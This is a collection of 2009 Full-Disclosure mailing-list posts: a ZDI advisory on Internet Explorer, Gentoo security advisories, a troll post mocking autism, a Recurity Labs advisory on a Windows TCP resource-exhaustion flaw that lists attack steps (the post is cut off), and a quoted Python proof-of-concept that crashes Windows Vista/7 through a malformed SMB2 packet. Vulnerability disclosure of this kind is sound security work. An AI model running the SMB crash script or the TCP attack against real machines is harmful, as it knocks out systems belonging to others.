[Full-disclosure] ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability
ZDI-09-062: Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-062 September 8, 2009 -- CVE ID: CVE-2009-1920 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8436. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists when parsing the jscript keyword arguments. Because the arguments object is not available until a certain time, invoking it can result in memory corruption. Successful exploitation of this vulnerability can lead to a remote system compromise under the credentials of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms09-045.mspx -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2009-09-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * ling wushi of team509 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] R. RHEL, RHCS, and Selinux : hype, reality or dream?
So it seems that it is not necessary to be a clever hacker as spender to disable SELinux on a system (http://grsecurity.net/~spender/exploit.txthttp://grsecurity.net/%7Espender/exploit.txt). Just follow the directions of the vendor. This one require to disable selinux for the proper function of one of its HA products, after years that the same vendor was critical with commercial product, o badly compiled open source for SELINUX execmem o textreloc issue, because they require the same. http://marc.info/?l=selinuxm=125244025732144w=2 James Morris first answer http://marc.info/?l=selinuxm=125245247920355w=2 So articles like this are just marketing? http://magazine.redhat.com/2007/05/04/whats-new-in-selinux-for-red-hat-enterprise-linux-5/ Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
Central Security District of UK [MI7.5] shadowdong...@hush.com wrote: I just go off the phone with intelligence MI7 and the CIB (Upgraded from CIA++, super savage secret) have relayed to me in code that n3td3v security is coming back stronger than ever. Over in Langley we know that n3td3v has the finest security tactics. Super fortified servers. Ultra mega ram. He is truly one of the most experienced blackhats in all the land. He is a master criminal. In other news, Gary McKinnon, elite pentagon hacker is an autistic rockstar: http://www.youtube.com/watch?v=XcOY0kWQaqc He's milking the success of his crime, instead apologizing, he's gloating. I guess that teaches people hacking is OK. My name is shadowdong007. Roger wilco. - Gary McKinnon, CISSP, MD. autistic only when I commit crimes, but really me when I'm on TV this is not n3td3v - laywyer this is a private mailing list, you're not allowed to say that. you should read up about public and private ownership. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-03 ] Apache Portable Runtime, APR Utility Library: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Apache Portable Runtime, APR Utility Library: Execution of arbitrary code Date: September 09, 2009 Bugs: #280514 ID: 200909-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows in the Apache Portable Runtime and its Utility Library might allow for the remote execution of arbitrary code. Background == The Apache Portable Runtime (aka APR) provides a set of APIs for creating platform-independent applications. The Apache Portable Runtime Utility Library (aka APR-Util) provides an interface to functionality such as XML parsing, string matching and databases connections. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 dev-libs/apr 1.3.8 = 1.3.8 2 dev-libs/apr-util1.3.9 = 1.3.9 --- 2 affected packages on all of their supported architectures. --- Description === Matt Lewis reported multiple Integer overflows in the apr_rmm_malloc(), apr_rmm_calloc(), and apr_rmm_realloc() functions in misc/apr_rmm.c of APR-Util and in memory/unix/apr_pools.c of APR, both occurring when aligning memory blocks. Impact == A remote attacker could entice a user to connect to a malicious server with software that uses the APR or act as a malicious client to a server that uses the APR (such as Subversion or Apache servers), possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Apache Portable Runtime users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/apr-1.3.8 All APR Utility Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/apr-util-1.3.9 References == [ 1 ] CVE-2009-2412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-04 ] Clam AntiVirus: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Clam AntiVirus: Multiple vulnerabilities Date: September 09, 2009 Bugs: #264834, #265545 ID: 200909-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in ClamAV allow for the remote execution of arbitrary code or Denial of Service. Background == Clam AntiVirus (short: ClamAV) is an anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav 0.95.2 = 0.95.2 Description === Multiple vulnerabilities have been found in ClamAV: * The vendor reported a Divide-by-zero error in the PE (Portable Executable; Windows .exe) file handling of ClamAV (CVE-2008-6680). * Jeffrey Thomas Peckham found a flaw in libclamav/untar.c, possibly resulting in an infinite loop when processing TAR archives in clamd and clamscan (CVE-2009-1270). * Martin Olsen reported a vulnerability in the CLI_ISCONTAINED macro in libclamav/others.h, when processing UPack archives (CVE-2009-1371). * Nigel disclosed a stack-based buffer overflow in the cli_url_canon() function in libclamav/phishcheck.c when processing URLs (CVE-2009-1372). Impact == A remote attacker could entice a user or automated system to process a specially crafted UPack archive or a file containing a specially crafted URL, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Furthermore, a remote attacker could cause a Denial of Service by supplying a specially crafted TAR archive or PE executable to a Clam AntiVirus instance. Workaround == There is no known workaround at this time. Resolution == All Clam AntiVirus users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-antivirus/clamav-0.95.2 References == [ 1 ] CVE-2008-6680 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6680 [ 2 ] CVE-2009-1270 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1270 [ 3 ] CVE-2009-1371 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1371 [ 4 ] CVE-2009-1372 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1372 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-05 ] Openswan: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Openswan: Denial of Service Date: September 09, 2009 Bugs: #264346, #275233 ID: 200909-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in the pluto IKE daemon of Openswan might allow remote attackers to cause a Denial of Service. Background == Openswan is an implementation of IPsec for Linux. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/openswan 2.4.15 = 2.4.15 Description === Multiple vulnerabilities have been discovered in Openswan: * Gerd v. Egidy reported a NULL pointer dereference in the Dead Peer Detection of the pluto IKE daemon as included in Openswan (CVE-2009-0790). * The Orange Labs vulnerability research team discovered multiple vulnerabilities in the ASN.1 parser (CVE-2009-2185). Impact == A remote attacker could exploit these vulnerabilities by sending specially crafted R_U_THERE or R_U_THERE_ACK packets, or a specially crafted X.509 certificate containing a malicious Relative Distinguished Name (RDN), UTCTIME string or GENERALIZEDTIME string to cause a Denial of Service of the pluto IKE daemon. Workaround == There is no known workaround at this time. Resolution == All Openswan users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/openswan-2.4.15 References == [ 1 ] CVE-2009-0790 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0790 [ 2 ] CVE-2009-2185 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2185 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-06 ] aMule: Parameter injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: aMule: Parameter injection Date: September 09, 2009 Bugs: #268163 ID: 200909-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An input validation error in aMule enables remote attackers to pass arbitrary parameters to a victim's media player. Background == aMule is an eMule-like client for the eD2k and Kademlia networks, supporting multiple platforms. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-p2p/amule2.2.5 = 2.2.5 Description === Sam Hocevar discovered that the aMule preview function does not properly sanitize file names. Impact == A remote attacker could entice a user to download a file with a specially crafted file name to inject arbitrary arguments to the victim's video player. Workaround == There is no known workaround at this time. Resolution == All aMule users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-p2p/amule-2.2.5 References == [ 1 ] CVE-2009-1440 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1440 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-07 ] TkMan: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: TkMan: Insecure temporary file usage Date: September 09, 2009 Bugs: #247540 ID: 200909-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in TkMan, allowing for symlink attacks. Background == TkMan is a graphical, hypertext manual page and Texinfo browser for UNIX. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-text/tkman 2.2-r1= 2.2-r1 Description === Dmitry E. Oboukhov reported that TkMan does not handle the /tmp/tkman# and /tmp/ll temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All TkMan users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/tkman-2.2-r1 References == [ 1 ] CVE-2008-5137 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5137 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-08 ] C* music player: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: C* music player: Insecure temporary file usage Date: September 09, 2009 Bugs: #250474 ID: 200909-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in the C* music player, allowing for symlink attacks. Background == The C* Music Player (cmus) is a modular and very configurable ncurses-based audio player. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/cmus 2.2.0-r1 = 2.2.0-r1 Description === Dmitry E. Oboukhov reported that cmus-status-display does not handle the /tmp/cmus-status temporary file securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All C* music player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-sound/cmus-2.2.0-r1 References == [ 1 ] CVE-2008-5375 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5375 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-09 ] Screenie: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Screenie: Insecure temporary file usage Date: September 09, 2009 Bugs: #250476 ID: 200909-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in Screenie, allowing for symlink attacks. Background == Screenie is a small screen frontend that is designed to be a session handler. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 app-misc/screenie 1.30.0-r1 = 1.30.0-r1 Description === Dmitry E. Oboukhov reported that Screenie does not handle /tmp/.screenie.# temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Screenie users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-misc/screenie-1.30.0-r1 References == [ 1 ] CVE-2008-5371 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5371 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-09.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-10 ] LMBench: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: LMBench: Insecure temporary file usage Date: September 09, 2009 Bugs: #246015 ID: 200909-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple insecure temporary file usage issues have been reported in LMBench, allowing for symlink attacks. Background == LMBench is a suite of simple, portable benchmarks for UNIX platforms. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-benchmarks/lmbench= 3Vulnerable! --- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Description === Dmitry E. Oboukhov reported that the rccs and STUFF scripts do not handle /tmp/sdiff.# temporary files securely. NOTE: There might be further occurances of insecure temporary file usage. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == LMBench has been removed from Portage. We recommend that users unmerge LMBench: # emerge --unmerge app-benchmarks/lmbench References == [ 1 ] CVE-2008-4968 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4968 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200909-11 ] GCC-XML: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GCC-XML: Insecure temporary file usage Date: September 09, 2009 Bugs: #245765 ID: 200909-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in GCC-XML allowing for symlink attacks. Background == GCC-XML is an XML output extension to the C++ front-end of GCC. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-cpp/gccxml 0.9.0_pre20090516 = 0.9.0_pre20090516 Description === Dmitry E. Oboukhov reported that find_flags in GCC-XML does not handle /tmp/*.cxx temporary files securely. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All GCC-XML users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-cpp/gccxml-0.9.0_pre20090516 References == [ 1 ] CVE-2008-4957 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4957 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TCP/IP Orphaned Connections Vulnerability
Hi, concerning MS09-048 and in particular CVE-2009-1926, we would like to publish the following advisory: http://www.recurity-labs.com/content/pub/Microsoft_Windows_CVE-2009-1926_MS09-048.txt regards, Fabian fabs Yamaguchi, Recurity Labs GmbH Recurity Labs GmbH http://www.recurity-labs.com entomol...@recurity-labs.com Date: 09.09.2009 Vendor:Microsoft Corporation Product: Microsoft Windows XP/Vista TCP/IP-Stack Vulnerability: TCP/IP Orphaned Connections Vulnerability Affected Releases: Windows Vista Business SP1/ Windows XP SP3 Severity: Moderate CVE: CVE-2009-1926 Vendor communication: 09.12.2008 Initial notification sent to MSRC 10.12.2008 Response from MSRC case manager - The report is being investigated. 23.12.2008 Recurity Labs would like to know whether MSRC considers this a vulnerability. If not so, Recurity Labs would like to mention the issue in an upcoming talk on TCP Denial Of Service vulnerabilities at the 25th Chaos Communication Congress (25C3). 28.12.2008 Recurity Labs agrees not to mention the issue until MSRC has has a chance to classify it. 09.01.2009 MSRC case manager asks for a copy of the presentation-slides. 13.01.2009 Vulnerability is classified as a 'Moderate' DoS by MSRC. 26.02.2009 Update on the issue by MSRC - A fix is scheduled for May or June. 27.03.2009 Update on the issue by MSRC - The fix is still scheduled for June. 08.05.2009 Update on the issue by MSRC - The fix is delayed to August. 29.07.2009 Meeting the MSRC case manager at BlackHat USA and getting a t-shirt. Thanks, nice move. 05.08.2009 Update on the issue by MSRC - The fix is ready but issues arose during testing. The release is rescheduled. 09.09.2009 Microsoft releases MS09-048 Overview: The TCP/IP-Stack of the Microsoft Windows XP/Vista Operating System is vulnerable to a remote resource exhaustion vulnerability. By taking advantage of this vulnerability, an attacker can cause a connection's Transmission Control Block (TCB) to remain in memory for an indefinite amount of time without the need for the attacker to further maintain the connection's activity. Description: The vulnerabilities exist in the implementation of TCP's flow-control mechanism, in particular due to incorrect handling of advertised zero-windows. Zero-windows may be advertised by a TCP after a connection enters the ESTABLISHED state to indicate that it is currently not able to accept any data due to limited buffer-space. Given that pending data exists, which the peer TCP needs to deliver, the peer then starts its persist-timer, which periodically queries the value of the flow-control window by issuing so called zero-window-probes. These probes are TCP segments containing a single byte of payload, which force the receiver to generate an acknowledgment, which in turn allows the peer to receive an update on the current value of the flow-control window. As a side effect, the retransmission-timer is disabled because persist- and retransmission-timer are mutually exclusive. The sending TCP is said to be in persist-state. In Windows XP and Windows Vista, connections, which are in the state FIN_WAIT_1 or FIN_WAIT_2 respectively do not ever terminate if the flow-control mechanism is in persist-state. This can be demonstrated as followed: 1. The Attacker establishes TCP-connection with the target. 2. The Attacker sends a specially crafted TCP-segment to the target. The segment must fulfill the following criteria: a) The advertised flow-control window is set to zero. b) If the layer5-application that is in possession of the socket associated with this connection does not automatically send data to the attacker, the segment needs to cause the application to do so. c) To increase the attack speed, the segment-data should cause the layer-5 application to terminate the connection as soon as possible. For example, if the layer-5 application is a web-server, a GET-Request, which references a non-existing resource, is a good choice. When targeting the NetBIOS Session Manager (port 139), simply sending an invalid request such as 'abc\n' is sufficient. 3. Since the layer-5 application closes the socket associated with the connection in response to the attacker's request, the connection moves into state FIN_WAIT_1 and is now
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
sk=showaction=viewid=64Itemid=15
is fd all 'bout trolls nao?
- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=
I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.
III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.
IV. PROOF OF CONCEPT
- -
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a char in the Process Id High SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be
\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).
VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.
VIII. REFERENCES
- -
http://microsoft.com
IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/
X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
